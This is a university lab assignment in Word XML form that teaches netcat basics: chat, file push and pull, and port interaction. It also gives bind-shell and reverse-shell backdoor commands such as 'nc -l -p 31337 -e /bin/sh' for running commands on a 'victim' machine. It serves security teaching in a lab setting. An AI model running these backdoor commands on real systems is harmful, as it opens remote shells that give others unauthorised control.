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2449" w14:textId="77777777" w:rsidR="004A2881" w:rsidRDefault="004A2881" w:rsidP="001151D4">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F6D315E" w14:textId="6F9AACC1" w:rsidR="001151D4" w:rsidRDefault="001151D4" w:rsidP="001151D4">
      <w:pPr>
        <w:spacing w:after="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52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab </w:t>
      </w:r>
      <w:r w:rsidR="004A2881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="000B7F5B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="000B7F5B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>The Joys of Netcat</w:t>
      </w:r>
      <w:r w:rsidR="004A2881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0BB772" w14:textId="77777777" w:rsidR="001151D4" w:rsidRDefault="00736648" w:rsidP="001151D4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pict w14:anchorId="4D263FDF">
          <v:rect id="_x0000_i1025" style="width:468pt;height:1.2pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E404E67" w14:textId="1BE26924" w:rsidR="004A2881" w:rsidRDefault="004A2881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7E85BD3" w14:textId="06ED7EA8" w:rsidR="000B7F5B" w:rsidRDefault="000B7F5B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are going to build on our Netcat skills with some exercises to flex our muscles. It is up to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>you</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> to determine the environment that you do this work in. If you like, you can use Kali 2017 and Kali 2020-3 in the IA Lab lab 11 environment. If you have a home set up, you can copy one Kali, and the two could communicate. Any setup you can envisage is acceptable; you can even do Linux to Windows, although you will need to do additional research to make that work for you. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>If in doubt, simply use the Lab 11 environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABD3513" w14:textId="17A9CE94" w:rsidR="000B7F5B" w:rsidRDefault="000B7F5B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866D1D7" w14:textId="23B37582" w:rsidR="000B7F5B" w:rsidRPr="000B7F5B" w:rsidRDefault="000B7F5B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task, you must complete the requested action and supply a screenshot. </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7F5B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>If it is in a Linux environment, your name should be visible in the background.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> For a Windows environment, I still need to see your name in an open text file or similar in the background.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46561CE6" w14:textId="15EF4ED9" w:rsidR="000B7F5B" w:rsidRDefault="000B7F5B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8B088D5" w14:textId="7ADCF1F0" w:rsidR="00736648" w:rsidRDefault="00736648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Make sure to number your response</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>; no numbering, no grade. If screenshots are unreadable due to being a too tiny to read, no points are given. Please crop screenshots appropriately. I only need to see what I am asking for – not the entire desktop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA1FB77" w14:textId="77777777" w:rsidR="00736648" w:rsidRDefault="00736648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1A9DD7F" w14:textId="77777777" w:rsidR="00736648" w:rsidRDefault="00736648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Provide screenshot(s) for each question, along with supporting text, to demonstrate you have satisfied each question. Most can be answer by 1-3 cropped screenshots. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4A9A30" w14:textId="093A7A34" w:rsidR="000B7F5B" w:rsidRDefault="00736648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236ED3AA" w14:textId="486E0246" w:rsidR="00736648" w:rsidRDefault="00736648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following questions have some suggested ways to implement this. You may vary from this, as need be! These are merely suggestions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63199194" w14:textId="5603C146" w:rsidR="00914D35" w:rsidRDefault="00914D35" w:rsidP="000B7F5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Create a netcat listener and a client. Have them “chat” between each other</w:t>
      </w:r>
      <w:r w:rsidR="00736648">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>, passing messages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0A54FB" w14:textId="5A814ACB" w:rsidR="00914D35" w:rsidRDefault="00914D35" w:rsidP="00914D35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nc -lvp 4444 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1F42B6" w14:textId="691A88A6" w:rsidR="00914D35" w:rsidRDefault="00914D35" w:rsidP="00914D35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nc [ip_address] 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F92990" w14:textId="4CAC0C19" w:rsidR="00736648" w:rsidRDefault="00736648" w:rsidP="00914D35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one say hello to you, using your first name. Have the other “reply.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C853C41" w14:textId="4A00EBA4" w:rsidR="00914D35" w:rsidRDefault="00914D35" w:rsidP="000B7F5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Push a file with Netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205CBC62" w14:textId="5ECC3F5C" w:rsidR="00914D35" w:rsidRDefault="00914D35" w:rsidP="00914D35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nc -l -p 21 &gt; file_name_your_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26531293" w14:textId="5CA7874F" w:rsidR="00914D35" w:rsidRDefault="00914D35" w:rsidP="00914D35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nc [ip_address] 21 &lt; file_name_your_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FEC834" w14:textId="01C4490E" w:rsidR="00914D35" w:rsidRDefault="00914D35" w:rsidP="00914D35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file_name_your_name should have as content your first and last name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62335C46" w14:textId="32EB591E" w:rsidR="00914D35" w:rsidRDefault="00914D35" w:rsidP="00914D35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machine that download it, view the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C6A4E6" w14:textId="133A2D97" w:rsidR="00914D35" w:rsidRDefault="00736648" w:rsidP="00914D35">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2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</w:t>
      </w:r>
      <w:r w:rsidR="00914D35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>at file_name_yourname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D022BBC" w14:textId="6B8C6850" w:rsidR="00914D35" w:rsidRDefault="00914D35" w:rsidP="000B7F5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Pull a file with Netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048AB336" w14:textId="129F7C10" w:rsidR="00914D35" w:rsidRDefault="00914D35" w:rsidP="00914D3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nc -l -p 22 &lt; file_to_send</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BFB29E" w14:textId="120DD707" w:rsidR="00914D35" w:rsidRDefault="00914D35" w:rsidP="00914D3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nc [ip_address] &gt; file_to_get</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACD6DB1" w14:textId="7D8CC759" w:rsidR="00914D35" w:rsidRDefault="00914D35" w:rsidP="00914D3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file_to_get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have as content your first and last name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> and today’s date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F5F000" w14:textId="77777777" w:rsidR="00914D35" w:rsidRDefault="00914D35" w:rsidP="00914D3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machine that download it, view the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A697580" w14:textId="55335D34" w:rsidR="00914D35" w:rsidRPr="00914D35" w:rsidRDefault="00736648" w:rsidP="00914D35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</w:t>
      </w:r>
      <w:r w:rsidR="00914D35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>at file_to_get</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D18714" w14:textId="05344553" w:rsidR="00914D35" w:rsidRDefault="00914D35" w:rsidP="000B7F5B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Use Netcat to interact with an open port of your choice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41542CC3" w14:textId="663D9FB3" w:rsidR="00914D35" w:rsidRDefault="00914D35" w:rsidP="00914D35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UDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237658D4" w14:textId="44B8C8BB" w:rsidR="00914D35" w:rsidRDefault="00914D35" w:rsidP="00914D35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nc -u target_ip_address port_num</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF2A7F7" w14:textId="6DCC69F3" w:rsidR="00914D35" w:rsidRDefault="00914D35" w:rsidP="00914D35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TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56097BD9" w14:textId="3842167B" w:rsidR="00914D35" w:rsidRDefault="00736648" w:rsidP="00914D35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</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00914D35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>c target_ip_address port_num</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181CD804" w14:textId="310860B4" w:rsidR="00066EC0" w:rsidRDefault="00066EC0" w:rsidP="00066EC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66EC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Netcat as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00066EC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>passive</w:t>
      </w:r>
      <w:r w:rsidRPr="00066EC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> backdoor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:r w:rsidRPr="00066EC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Bind a service to a port and execute once it connects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2972AA17" w14:textId="552849A7" w:rsidR="00066EC0" w:rsidRPr="00066EC0" w:rsidRDefault="00066EC0" w:rsidP="00066EC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Create Backdoor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F921C78" w14:textId="77777777" w:rsidR="00066EC0" w:rsidRDefault="00066EC0" w:rsidP="00066EC0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Windows: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6547A50B" w14:textId="20EA8236" w:rsidR="000B7F5B" w:rsidRDefault="00066EC0" w:rsidP="00066EC0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nc -l -p 31337 -e cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F6529A" w14:textId="699D9A6A" w:rsidR="00066EC0" w:rsidRDefault="00066EC0" w:rsidP="00066EC0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Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282F5B55" w14:textId="035B130C" w:rsidR="00066EC0" w:rsidRDefault="00066EC0" w:rsidP="00066EC0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nc -l -p 31337 -e /bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445555CD" w14:textId="29898C2A" w:rsidR="00066EC0" w:rsidRDefault="00066EC0" w:rsidP="00066EC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Connect to Backdoor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B98593" w14:textId="5F19177F" w:rsidR="000B7F5B" w:rsidRDefault="00066EC0" w:rsidP="00066EC0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nc [ip_address] port_num</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B82C5C" w14:textId="0976DD60" w:rsidR="00066EC0" w:rsidRDefault="00066EC0" w:rsidP="00066EC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Once you connect, execute a few basic commands on the victim through your backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5DF297" w14:textId="2A538E24" w:rsidR="00066EC0" w:rsidRDefault="00066EC0" w:rsidP="00066EC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66EC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Netcat as a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>active</w:t>
      </w:r>
      <w:r w:rsidRPr="00066EC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> backdoor </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6280D7C3" w14:textId="2B3B7D61" w:rsidR="00066EC0" w:rsidRDefault="00066EC0" w:rsidP="0073664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attacker machine, set up a listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2445CCD4" w14:textId="7F9D3BDA" w:rsidR="00066EC0" w:rsidRDefault="00066EC0" w:rsidP="00736648">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1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nc -lpv 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0E26D6" w14:textId="455D2092" w:rsidR="00066EC0" w:rsidRDefault="00066EC0" w:rsidP="0073664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target machine, have it connect to attacker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B749B9" w14:textId="4C9BE76E" w:rsidR="00066EC0" w:rsidRDefault="00066EC0" w:rsidP="00736648">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1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Nc [ip_address] -e/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6453BF9D" w14:textId="6F0456F7" w:rsidR="00066EC0" w:rsidRDefault="00066EC0" w:rsidP="0073664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attacker machine, once you have successfully connected, start executing commands on the target machine, e.g. ifconfig.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14892384" w14:textId="77777777" w:rsidR="00736648" w:rsidRDefault="00736648" w:rsidP="00736648">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="1447"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7531FAF7" w14:textId="77777777" w:rsidR="00736648" w:rsidRPr="00736648" w:rsidRDefault="00736648" w:rsidP="00066EC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36648"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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">xtra Credit (4 points). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F99E0C4" w14:textId="75952178" w:rsidR="00066EC0" w:rsidRPr="00066EC0" w:rsidRDefault="00736648" w:rsidP="00736648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Relay traffic with Netcat. Relay traffic over four different machines. Provide sufficient screenshots and/or video to demonstrate success. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614A7FE6" w14:textId="77777777" w:rsidR="00CF4832" w:rsidRDefault="00CF4832" w:rsidP="004A2881">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34F506A6" w14:textId="5677F9CE" w:rsidR="001151D4" w:rsidRDefault="001151D4" w:rsidP="001151D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Deliverables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEAA82F" w14:textId="018183DB" w:rsidR="001151D4" w:rsidRDefault="001151D4" w:rsidP="00CF4832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These MUST be contained all in one PDF or DOC/DOCX. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AC1956" w14:textId="7A368334" w:rsidR="00CF4832" w:rsidRDefault="00CF4832" w:rsidP="00CF4832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Crop screenshots appropriately; points are taken off if this is not done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4142D071" w14:textId="02198E19" w:rsidR="001151D4" w:rsidRDefault="001151D4" w:rsidP="001151D4">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7806835E" w14:textId="77777777" w:rsidR="001151D4" w:rsidRPr="001151D4" w:rsidRDefault="001151D4" w:rsidP="001151D4"/>
    <w:sectPr w:rsidR="001151D4" w:rsidRPr="0011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15BA1D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="617E9B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041BFD4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E7BC95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B89019"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="150DC9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4C3AB3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="86AA981C"/>
    <w:lvl w:ilvl="0" w:tplc="D9D09EA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0B12"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CB16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E5953"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="13748962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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1345028A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="59BC03A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7" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0409000F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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="197558EC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="54A46E70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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="21026F0C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C8BEA0A2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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="296C5771"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B4326206"/>
    <w:lvl w:ilvl="0" w:tplc="F92A5D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F0B30"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AE963664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4987A1F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="83389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F6940"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F91A0A86"/>
    <w:lvl w:ilvl="0" w:tplc="0409000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="216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13" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4843066B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CD34FD1A"/>
    <w:lvl w:ilvl="0" w:tplc="F92A5D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344B3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F15FA9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0FE56D7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2CB47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763FB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CB5A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96BFA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3F2E3778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18" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6B556471"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1F1A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70950"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3E38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D351F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="60D8AFE8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21" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="789C4836"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1B328CAC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15"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="17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D4"/>
    <w:rsid w:val="00066EC0"/>
    <w:rsid w:val="000676BB"/>
    <w:rsid w:val="000B6188"/>
    <w:rsid w:val="000B7F5B"/>
    <w:rsid w:val="001151D4"/>
    <w:rsid w:val="001F062B"/>
    <w:rsid w:val="002A2D65"/>
    <w:rsid w:val="002E0376"/>
    <w:rsid w:val="002F6B84"/>
    <w:rsid w:val="00346438"/>
    <w:rsid w:val="00361CFC"/>
    <w:rsid w:val="004A2881"/>
    <w:rsid w:val="0051142C"/>
    <w:rsid w:val="00686DE8"/>
    <w:rsid w:val="00721AA0"/>
    <w:rsid w:val="00736648"/>
    <w:rsid w:val="00914D35"/>
    <w:rsid w:val="00AB0F40"/>
    <w:rsid w:val="00CF4832"/>
    <w:rsid w:val="00D5293D"/>
    <w:rsid w:val="00E16330"/>
    <w:rsid w:val="00E17B4E"/>
    <w:rsid w:val="00F57898"/>
    <w:rsid w:val="00F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38E0"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2D299D29-384C-41C4-97D7-278D096B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1D4"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/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F4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F4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40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F40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F40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F40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F40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F40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F40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4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F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0F4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F4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F4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F4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F4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0F4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F40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0F4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F4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B0F4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B0F4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B0F40"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00AB0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F4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F4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B0F4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B0F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0F4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0F4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B0F4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B0F40"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:rsid w:val="001151D4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1D4"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Standard">
    <w:name w:val="Standard"/>
    <w:rsid w:val="002F6B84"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:suppressAutoHyphens/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="left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Brizendine, Bramwell</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Brizendine, Bramwell</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-10-28T18:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-11T01:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>